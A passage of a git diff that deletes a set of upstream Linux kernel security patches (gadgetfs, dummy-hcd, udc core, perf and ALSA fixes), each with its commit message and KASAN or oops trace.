-@@ -239,7 +239,7 @@ static inline const char *__check_heap_object(const void *ptr,
-  * be allocated from the same page.
-  */
- #define KMALLOC_SHIFT_HIGH	PAGE_SHIFT
--#define KMALLOC_SHIFT_MAX	30
-+#define KMALLOC_SHIFT_MAX	(MAX_ORDER + PAGE_SHIFT - 1)
- #ifndef KMALLOC_SHIFT_LOW
- #define KMALLOC_SHIFT_LOW	3
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch
deleted file mode 100644
index e704bf63..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From faab50984fe6636e616c7cc3d30308ba391d36fd Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Fri, 9 Dec 2016 15:17:46 -0500
-Subject: [PATCH] USB: gadgetfs: fix unbounded memory allocation bug
-
-Andrey Konovalov reports that fuzz testing with syzkaller causes a
-KASAN warning in gadgetfs:
-
-BUG: KASAN: slab-out-of-bounds in dev_config+0x86f/0x1190 at addr ffff88003c47e160
-Write of size 65537 by task syz-executor0/6356
-CPU: 3 PID: 6356 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #19
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88003c107ad8 ffffffff81f96aba ffffffff3dc11ef0 1ffff10007820eee
- ffffed0007820ee6 ffff88003dc11f00 0000000041b58ab3 ffffffff8598b4c8
- ffffffff81f96828 ffffffff813fb4a0 ffff88003b6eadc0 ffff88003c107738
-Call Trace:
- [<     inline     >] __dump_stack lib/dump_stack.c:15
- [<ffffffff81f96aba>] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [<ffffffff817e4dec>] kasan_object_err+0x1c/0x70 mm/kasan/report.c:159
- [<     inline     >] print_address_description mm/kasan/report.c:197
- [<ffffffff817e5080>] kasan_report_error+0x1f0/0x4e0 mm/kasan/report.c:286
- [<ffffffff817e5705>] kasan_report+0x35/0x40 mm/kasan/report.c:306
- [<     inline     >] check_memory_region_inline mm/kasan/kasan.c:308
- [<ffffffff817e3fb9>] check_memory_region+0x139/0x190 mm/kasan/kasan.c:315
- [<ffffffff817e4044>] kasan_check_write+0x14/0x20 mm/kasan/kasan.c:326
- [<     inline     >] copy_from_user arch/x86/include/asm/uaccess.h:689
- [<     inline     >] ep0_write drivers/usb/gadget/legacy/inode.c:1135
- [<ffffffff83228caf>] dev_config+0x86f/0x1190 drivers/usb/gadget/legacy/inode.c:1759
- [<ffffffff817fdd55>] __vfs_write+0x5d5/0x760 fs/read_write.c:510
- [<ffffffff817ff650>] vfs_write+0x170/0x4e0 fs/read_write.c:560
- [<     inline     >] SYSC_write fs/read_write.c:607
- [<ffffffff81803a5b>] SyS_write+0xfb/0x230 fs/read_write.c:599
- [<ffffffff84f47ec1>] entry_SYSCALL_64_fastpath+0x1f/0xc2
-
-Indeed, there is a comment saying that the value of len is restricted
-to a 16-bit integer, but the code doesn't actually do this.
-
-This patch fixes the warning.  It replaces the comment with a
-computation that forces the amount of data copied from the user in
-ep0_write() to be no larger than the wLength size for the control
-transfer, which is a 16-bit quantity.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/legacy/inode.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 48f1409b438ad..01ed3bc0c3c8e 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1126,7 +1126,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 	/* data and/or status stage for control request */
- 	} else if (dev->state == STATE_DEV_SETUP) {
- 
--		/* IN DATA+STATUS caller makes len <= wLength */
-+		len = min_t(size_t, len, dev->setup_wLength);
- 		if (dev->setup_in) {
- 			retval = setup_req (dev->gadget->ep0, dev->req, len);
- 			if (retval == 0) {
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch
deleted file mode 100644
index 09a35d55..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From bcdbeb844773333d2d1c08004f3b3e25921040e5 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Wed, 14 Dec 2016 14:55:56 -0500
-Subject: [PATCH] USB: dummy-hcd: fix bug in stop_activity (handle ep0)
-
-The stop_activity() routine in dummy-hcd is supposed to unlink all
-active requests for every endpoint, among other things.  But it
-doesn't handle ep0.  As a result, fuzz testing can generate a WARNING
-like the following:
-
-WARNING: CPU: 0 PID: 4410 at drivers/usb/gadget/udc/dummy_hcd.c:672 dummy_free_request+0x153/0x170
-Modules linked in:
-CPU: 0 PID: 4410 Comm: syz-executor Not tainted 4.9.0-rc7+ #32
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88006a64ed10 ffffffff81f96b8a ffffffff41b58ab3 1ffff1000d4c9d35
- ffffed000d4c9d2d ffff880065f8ac00 0000000041b58ab3 ffffffff8598b510
- ffffffff81f968f8 0000000041b58ab3 ffffffff859410e0 ffffffff813f0590
-Call Trace:
- [<     inline     >] __dump_stack lib/dump_stack.c:15
- [<ffffffff81f96b8a>] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [<ffffffff812b808f>] __warn+0x19f/0x1e0 kernel/panic.c:550
- [<ffffffff812b831c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
- [<ffffffff830fcb13>] dummy_free_request+0x153/0x170 drivers/usb/gadget/udc/dummy_hcd.c:672
- [<ffffffff830ed1b0>] usb_ep_free_request+0xc0/0x420 drivers/usb/gadget/udc/core.c:195
- [<ffffffff83225031>] gadgetfs_unbind+0x131/0x190 drivers/usb/gadget/legacy/inode.c:1612
- [<ffffffff830ebd8f>] usb_gadget_remove_driver+0x10f/0x2b0 drivers/usb/gadget/udc/core.c:1228
- [<ffffffff830ec084>] usb_gadget_unregister_driver+0x154/0x240 drivers/usb/gadget/udc/core.c:1357
-
-This patch fixes the problem by iterating over all the endpoints in
-the driver's ep array instead of iterating over the gadget's ep_list,
-which explicitly leaves out ep0.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/udc/dummy_hcd.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c
-index 02b14e91ae6c5..c60abe3a68f9c 100644
---- a/drivers/usb/gadget/udc/dummy_hcd.c
-+++ b/drivers/usb/gadget/udc/dummy_hcd.c
-@@ -330,7 +330,7 @@ static void nuke(struct dummy *dum, struct dummy_ep *ep)
- /* caller must hold lock */
- static void stop_activity(struct dummy *dum)
- {
--	struct dummy_ep	*ep;
-+	int i;
- 
- 	/* prevent any more requests */
- 	dum->address = 0;
-@@ -338,8 +338,8 @@ static void stop_activity(struct dummy *dum)
- 	/* The timer is left running so that outstanding URBs can fail */
- 
- 	/* nuke any pending requests first, so driver i/o is quiesced */
--	list_for_each_entry(ep, &dum->gadget.ep_list, ep.ep_list)
--		nuke(dum, ep);
-+	for (i = 0; i < DUMMY_ENDPOINTS; ++i)
-+		nuke(dum, &dum->ep[i]);
- 
- 	/* driver now does any non-usb quiescing necessary */
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch
deleted file mode 100644
index e4477260..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From 1c069b057dcf64fada952eaa868d35f02bb0cfc2 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Fri, 9 Dec 2016 15:24:24 -0500
-Subject: [PATCH] USB: gadgetfs: fix checks of wTotalLength in config
- descriptors
-
-Andrey Konovalov's fuzz testing of gadgetfs showed that we should
-improve the driver's checks for valid configuration descriptors passed
-in by the user.  In particular, the driver needs to verify that the
-wTotalLength value in the descriptor is not too short (smaller
-than USB_DT_CONFIG_SIZE).  And the check for whether wTotalLength is
-too large has to be changed, because the driver assumes there is
-always enough room remaining in the buffer to hold a device descriptor
-(at least USB_DT_DEVICE_SIZE bytes).
-
-This patch adds the additional check and fixes the existing check.  It
-may do a little more than strictly necessary, but one extra check
-won't hurt.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-CC: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/legacy/inode.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index f1ca339426073..08e5ecc050795 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1734,10 +1734,12 @@ static struct usb_gadget_driver gadgetfs_driver = {
-  * such as configuration notifications.
-  */
- 
--static int is_valid_config (struct usb_config_descriptor *config)
-+static int is_valid_config(struct usb_config_descriptor *config,
-+		unsigned int total)
- {
- 	return config->bDescriptorType == USB_DT_CONFIG
- 		&& config->bLength == USB_DT_CONFIG_SIZE
-+		&& total >= USB_DT_CONFIG_SIZE
- 		&& config->bConfigurationValue != 0
- 		&& (config->bmAttributes & USB_CONFIG_ATT_ONE) != 0
- 		&& (config->bmAttributes & USB_CONFIG_ATT_WAKEUP) == 0;
-@@ -1787,7 +1789,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 	/* full or low speed config */
- 	dev->config = (void *) kbuf;
- 	total = le16_to_cpu(dev->config->wTotalLength);
--	if (!is_valid_config (dev->config) || total >= length)
-+	if (!is_valid_config(dev->config, total) ||
-+			total > length - USB_DT_DEVICE_SIZE)
- 		goto fail;
- 	kbuf += total;
- 	length -= total;
-@@ -1796,7 +1799,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 	if (kbuf [1] == USB_DT_CONFIG) {
- 		dev->hs_config = (void *) kbuf;
- 		total = le16_to_cpu(dev->hs_config->wTotalLength);
--		if (!is_valid_config (dev->hs_config) || total >= length)
-+		if (!is_valid_config(dev->hs_config, total) ||
-+				total > length - USB_DT_DEVICE_SIZE)
- 			goto fail;
- 		kbuf += total;
- 		length -= total;
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch
deleted file mode 100644
index f3962a88..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From add333a81a16abbd4f106266a2553677a165725f Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Fri, 9 Dec 2016 15:18:43 -0500
-Subject: [PATCH] USB: gadgetfs: fix use-after-free bug
-
-Andrey Konovalov reports that fuzz testing with syzkaller causes a
-KASAN use-after-free bug report in gadgetfs:
-
-BUG: KASAN: use-after-free in gadgetfs_setup+0x208a/0x20e0 at addr ffff88003dfe5bf2
-Read of size 2 by task syz-executor0/22994
-CPU: 3 PID: 22994 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #16
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88006df06a18 ffffffff81f96aba ffffffffe0528500 1ffff1000dbe0cd6
- ffffed000dbe0cce ffff88006df068f0 0000000041b58ab3 ffffffff8598b4c8
- ffffffff81f96828 1ffff1000dbe0ccd ffff88006df06708 ffff88006df06748
-Call Trace:
- <IRQ> [  201.343209]  [<     inline     >] __dump_stack lib/dump_stack.c:15
- <IRQ> [  201.343209]  [<ffffffff81f96aba>] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [<ffffffff817e4dec>] kasan_object_err+0x1c/0x70 mm/kasan/report.c:159
- [<     inline     >] print_address_description mm/kasan/report.c:197
- [<ffffffff817e5080>] kasan_report_error+0x1f0/0x4e0 mm/kasan/report.c:286
- [<     inline     >] kasan_report mm/kasan/report.c:306
- [<ffffffff817e562a>] __asan_report_load_n_noabort+0x3a/0x40 mm/kasan/report.c:337
- [<     inline     >] config_buf drivers/usb/gadget/legacy/inode.c:1298
- [<ffffffff8322c8fa>] gadgetfs_setup+0x208a/0x20e0 drivers/usb/gadget/legacy/inode.c:1368
- [<ffffffff830fdcd0>] dummy_timer+0x11f0/0x36d0 drivers/usb/gadget/udc/dummy_hcd.c:1858
- [<ffffffff814807c1>] call_timer_fn+0x241/0x800 kernel/time/timer.c:1308
- [<     inline     >] expire_timers kernel/time/timer.c:1348
- [<ffffffff81482de6>] __run_timers+0xa06/0xec0 kernel/time/timer.c:1641
- [<ffffffff814832c1>] run_timer_softirq+0x21/0x80 kernel/time/timer.c:1654
- [<ffffffff84f4af8b>] __do_softirq+0x2fb/0xb63 kernel/softirq.c:284
-
-The cause of the bug is subtle.  The dev_config() routine gets called
-twice by the fuzzer.  The first time, the user data contains both a
-full-speed configuration descriptor and a high-speed config
-descriptor, causing dev->hs_config to be set.  But it also contains an
-invalid device descriptor, so the buffer containing the descriptors is
-deallocated and dev_config() returns an error.
-
-The second time dev_config() is called, the user data contains only a
-full-speed config descriptor.  But dev->hs_config still has the stale
-pointer remaining from the first call, causing the routine to think
-that there is a valid high-speed config.  Later on, when the driver
-dereferences the stale pointer to copy that descriptor, we get a
-use-after-free access.
-
-The fix is simple: Clear dev->hs_config if the passed-in data does not
-contain a high-speed config descriptor.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/legacy/inode.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 01ed3bc0c3c8e..f1ca339426073 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1800,6 +1800,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 			goto fail;
- 		kbuf += total;
- 		length -= total;
-+	} else {
-+		dev->hs_config = NULL;
- 	}
- 
- 	/* could support multiple configs, using another encoding! */
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch
deleted file mode 100644
index 3bc2aaa8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch
+++ /dev/null
@@ -1,129 +0,0 @@
-From 7b01738112608ce47083178ae2b9ebadf02d32cc Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Felix=20H=C3=A4dicke?= <felixhaedicke@web.de>
-Date: Thu, 29 Dec 2016 23:02:11 +0100
-Subject: [PATCH] usb: gadget: udc: core: fix return code of
- usb_gadget_probe_driver()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-This fixes a regression which was introduced by commit f1bddbb, by
-reverting a small fragment of commit 855ed04.
-
-If the following conditions were met, usb_gadget_probe_driver() returned
-0, although the call was unsuccessful:
-1. A particular UDC was specified by thge gadget driver (using member
-"udc_name" of struct usb_gadget_driver).
-2. The UDC with this name is available.
-3. Another gadget driver is already bound to this gadget.
-4. The gadget driver has the "match_existing_only" flag set.
-In this case, the return code variable "ret" is set to 0, the return
-code of a strcmp() call (to check for the second condition).
-
-This also fixes an oops which could occur in the following scenario:
-1. Two usb gadget instances were configured using configfs.
-2. The first gadget configuration was bound to a UDC (using the configfs
-attribute "UDC").
-3. It was tried to bind the second gadget configuration to the same UDC
-in the same way. This operation was then wrongly reported as being
-successful.
-4. The second gadget configuration's "UDC" attribute is cleared, to
-unbind the (not really bound) second gadget configuration from the UDC.
-
-<BUG: unable to handle kernel NULL pointer dereference
-at           (null)
-IP: [<ffffffff94f5e5e9>] __list_del_entry+0x29/0xc0
-PGD 41b4c5067
-PUD 41a598067
-PMD 0
-
-Oops: 0000 [#1] SMP
-Modules linked in: cdc_acm usb_f_fs usb_f_serial
-usb_f_acm u_serial libcomposite configfs dummy_hcd bnep intel_rapl
-x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm
-snd_hda_codec_hdmi irqbypass crct10dif_pclmul crc32_pclmul
-ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper
-ablk_helper cryptd snd_hda_codec_realtek snd_hda_codec_generic serio_raw
-uvcvideo videobuf2_vmalloc btusb snd_usb_audio snd_hda_intel
-videobuf2_memops btrtl snd_hda_codec snd_hda_core snd_usbmidi_lib btbcm
-videobuf2_v4l2 btintel snd_hwdep videobuf2_core snd_seq_midi bluetooth
-snd_seq_midi_event videodev xpad efi_pstore snd_pcm_oss rfkill joydev
-media crc16 ff_memless snd_mixer_oss snd_rawmidi nls_ascii snd_pcm
-snd_seq snd_seq_device nls_cp437 mei_me snd_timer vfat sg udc_core
-lpc_ich fat
-efivars mfd_core mei snd soundcore battery nuvoton_cir rc_core evdev
-intel_smartconnect ie31200_edac edac_core shpchp tpm_tis tpm_tis_core
-tpm parport_pc ppdev lp parport efivarfs autofs4 btrfs xor raid6_pq
-hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid uas
-usb_storage sr_mod cdrom sd_mod ahci libahci nouveau i915 crc32c_intel
-i2c_algo_bit psmouse ttm xhci_pci libata scsi_mod ehci_pci
-drm_kms_helper xhci_hcd ehci_hcd r8169 mii usbcore drm nvme nvme_core
-fjes button [last unloaded: net2280]
-CPU: 5 PID: 829 Comm: bash Not tainted 4.9.0-rc7 #1
-Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./Z77
-Extreme3, BIOS P1.50 07/11/2013
-task: ffff880419ce4040 task.stack: ffffc90002ed4000
-RIP: 0010:[<ffffffff94f5e5e9>]  [<ffffffff94f5e5e9>]
-__list_del_entry+0x29/0xc0
-RSP: 0018:ffffc90002ed7d68  EFLAGS: 00010207
-RAX: 0000000000000000 RBX: ffff88041787ec30 RCX: dead000000000200
-RDX: 0000000000000000 RSI: ffff880417482002 RDI: ffff88041787ec30
-RBP: ffffc90002ed7d68 R08: 0000000000000000 R09: 0000000000000010
-R10: 0000000000000000 R11: ffff880419ce4040 R12: ffff88041787eb68
-R13: ffff88041787eaa8 R14: ffff88041560a2c0 R15: 0000000000000001
-FS:  00007fe4e49b8700(0000) GS:ffff88042f340000(0000)
-knlGS:0000000000000000
-CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-CR2: 0000000000000000 CR3: 000000041b4c4000 CR4: 00000000001406e0
-Stack:
-ffffc90002ed7d80 ffffffff94f5e68d ffffffffc0ae5ef0 ffffc90002ed7da0
-ffffffffc0ae22aa ffff88041787e800 ffff88041787e800 ffffc90002ed7dc0
-ffffffffc0d7a727 ffffffff952273fa ffff88041aba5760 ffffc90002ed7df8
-Call Trace:
-[<ffffffff94f5e68d>] list_del+0xd/0x30
-[<ffffffffc0ae22aa>] usb_gadget_unregister_driver+0xaa/0xc0 [udc_core]
-[<ffffffffc0d7a727>] unregister_gadget+0x27/0x60 [libcomposite]
-[<ffffffff952273fa>] ? mutex_lock+0x1a/0x30
-[<ffffffffc0d7a9b8>] gadget_dev_desc_UDC_store+0x88/0xe0 [libcomposite]
-[<ffffffffc0af8aa0>] configfs_write_file+0xa0/0x100 [configfs]
-[<ffffffff94e10d27>] __vfs_write+0x37/0x160
-[<ffffffff94e31430>] ? __fd_install+0x30/0xd0
-[<ffffffff95229dae>] ? _raw_spin_unlock+0xe/0x10
-[<ffffffff94e11458>] vfs_write+0xb8/0x1b0
-[<ffffffff94e128f8>] SyS_write+0x58/0xc0
-[<ffffffff94e31594>] ? __close_fd+0x94/0xc0
-[<ffffffff9522a0fb>] entry_SYSCALL_64_fastpath+0x1e/0xad
-Code: 66 90 55 48 8b 07 48 b9 00 01 00 00 00 00 ad de 48 8b 57 08 48 89
-e5 48 39 c8 74 29 48 b9 00 02 00 00 00 00 ad de 48 39 ca 74 3a <4c> 8b
-02 4c 39 c7 75 52 4c 8b 40 08 4c 39 c7 75 66 48 89 50 08
-RIP  [<ffffffff94f5e5e9>] __list_del_entry+0x29/0xc0
-RSP <ffffc90002ed7d68>
-CR2: 0000000000000000
----[ end trace 99fc090ab3ff6cbc ]---
-
-Fixes: f1bddbb ("usb: gadget: Fix binding to UDC via configfs
-interface")
-Signed-off-by: Felix Hädicke <felixhaedicke@web.de>
-Tested-by: Krzysztof Opasiak <k.opasiak@samsung.com>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/udc/core.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
-index 9483489080f66..0402177f93cdd 100644
---- a/drivers/usb/gadget/udc/core.c
-+++ b/drivers/usb/gadget/udc/core.c
-@@ -1317,7 +1317,11 @@ int usb_gadget_probe_driver(struct usb_gadget_driver *driver)
- 			if (!ret)
- 				break;
- 		}
--		if (!ret && !udc->driver)
-+		if (ret)
-+			ret = -ENODEV;
-+		else if (udc->driver)
-+			ret = -EBUSY;
-+		else
- 			goto found;
- 	} else {
- 		list_for_each_entry(udc, &udc_list, list) {
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch
deleted file mode 100644
index ae0f884b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 0994b0a257557e18ee8f0b7c5f0f73fe2b54eec1 Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Date: Tue, 6 Dec 2016 08:36:29 +0100
-Subject: [PATCH] usb: gadgetfs: restrict upper bound on device configuration
- size
-
-Andrey Konovalov reported that we were not properly checking the upper
-limit before of a device configuration size before calling
-memdup_user(), which could cause some problems.
-
-So set the upper limit to PAGE_SIZE * 4, which should be good enough for
-all devices.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/legacy/inode.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index e8f4102d19df5..48f1409b438ad 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1762,7 +1762,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 	}
- 	spin_unlock_irq(&dev->lock);
- 
--	if (len < (USB_DT_CONFIG_SIZE + USB_DT_DEVICE_SIZE + 4))
-+	if ((len < (USB_DT_CONFIG_SIZE + USB_DT_DEVICE_SIZE + 4)) ||
-+	    (len > PAGE_SIZE * 4))
- 		return -EINVAL;
- 
- 	/* we might need to change message format someday */
diff --git a/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch
deleted file mode 100644
index 6de691a0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 2c5c1fd0d2a2a96fab750fa332cb703022c16c04 Mon Sep 17 00:00:00 2001
-From: John Dias <joaodias@google.com>
-Date: Wed, 9 Nov 2016 11:03:57 -0800
-Subject: [PATCH] perf: don't leave group_entry on sibling list
- (use-after-free)
-
-When perf_group_detach is called on a group leader,
-it should empty its sibling list. Otherwise, when
-a sibling is later deallocated, list_del_event()
-removes the sibling's group_entry from its current
-list, which can be the now-deallocated group leader's
-sibling list (use-after-free bug).
-
-Bug: 32402548
-Change-Id: I99f6bc97c8518df1cb0035814368012ba72ab1f1
-Signed-off-by: John Dias <joaodias@google.com>
----
- kernel/events/core.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 01eab13ec0e7e..b7e1e224f07e9 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -1449,10 +1449,17 @@ static void perf_group_detach(struct perf_event *event)
- 	 * If this was a group event with sibling events then
- 	 * upgrade the siblings to singleton events by adding them
- 	 * to whatever list we are on.
-+	 * If this isn't on a list, make sure we still remove the sibling's
-+	 * group_entry from this sibling_list; otherwise, when that sibling
-+	 * is later deallocated, it will try to remove itself from this
-+	 * sibling_list, which may well have been deallocated already,
-+	 * resulting in a use-after-free.
- 	 */
- 	list_for_each_entry_safe(sibling, tmp, &event->sibling_list, group_entry) {
- 		if (list)
- 			list_move_tail(&sibling->group_entry, list);
-+		else
-+			list_del_init(&sibling->group_entry);
- 		sibling->group_leader = sibling;
- 
- 		/* Inherit group flags from the previous leader */
diff --git a/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch
deleted file mode 100644
index 3b802d6e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4faa6d2e9b53546823882d8889820ff9ce3c372f Mon Sep 17 00:00:00 2001
-From: Siqi Lin <siqilin@google.com>
-Date: Wed, 2 Nov 2016 16:51:08 -0700
-Subject: [PATCH] ALSA: info: Check for integer overflow in
- snd_info_entry_write()
-
-snd_info_entry_write() resizes the buffer with an unsigned long
-size argument that gets truncated because resize_info_buffer()
-takes the size parameter as an unsigned int. On 64-bit kernels,
-this causes the following copy_to_user() to write out-of-bounds
-if (pos + count) can't be represented by an unsigned int.
-
-Bug: 32510733
-Change-Id: I9e8b55f93f2bd606b4a73b5a4525b71ee88c7c23
-Signed-off-by: Siqi Lin <siqilin@google.com>
----
- sound/core/info.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/sound/core/info.c b/sound/core/info.c
-index 418b4ec43cadb..a4af0ba92d30f 100644
---- a/sound/core/info.c
-+++ b/sound/core/info.c
-@@ -253,6 +253,7 @@ static ssize_t snd_info_entry_write(struct file *file, const char __user *buffer
- 	struct snd_info_buffer *buf;
- 	ssize_t size = 0;
- 	loff_t pos;
-+	unsigned long realloc_size;
- 
- 	data = file->private_data;
- 	if (snd_BUG_ON(!data))
-@@ -261,7 +262,8 @@ static ssize_t snd_info_entry_write(struct file *file, const char __user *buffer
- 	pos = *offset;
- 	if (pos < 0 || (long) pos != pos || (ssize_t) count < 0)
- 		return -EIO;
--	if ((unsigned long) pos + (unsigned long) count < (unsigned long) pos)
-+	realloc_size = (unsigned long) pos + (unsigned long) count;
-+	if (realloc_size < (unsigned long) pos || realloc_size > UINT_MAX)
- 		return -EIO;
- 	switch (entry->content) {
- 	case SNDRV_INFO_CONTENT_TEXT:
diff --git a/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch
deleted file mode 100644
index 8e686e81..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 5db4167c9924c68ab9554bba3a98ecfd14b91a8e Mon Sep 17 00:00:00 2001
-From: Adrian Salido <salidoa@google.com>
-Date: Thu, 1 Dec 2016 18:07:42 -0800
-Subject: [PATCH] fs/proc/array.c: make safe access to group_leader
-
-As mentioned in commit 52ee2dfdd4f51cf422ea6a96a0846dc94244aa37
-("pids: refactor vnr/nr_ns helpers to make them safe"). *_nr_ns
-helpers used to be buggy. The commit addresses most of the helpers but
-is missing task_tgid_xxx()
-
-Without this protection there is a possible use after free reported by
-kasan instrumented kernel:
-
-==================================================================
-BUG: KASAN: use-after-free in task_tgid_nr_ns+0x2c/0x44 at addr ***
-Read of size 8 by task cat/2472
-CPU: 1 PID: 2472 Comm: cat Tainted: ****
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[<ffffffc00020ad2c>] dump_backtrace+0x0/0x17c
-[<ffffffc00020aec0>] show_stack+0x18/0x24
-[<ffffffc0011573d0>] dump_stack+0x94/0x100
-[<ffffffc0003c7dc0>] kasan_report+0x308/0x554
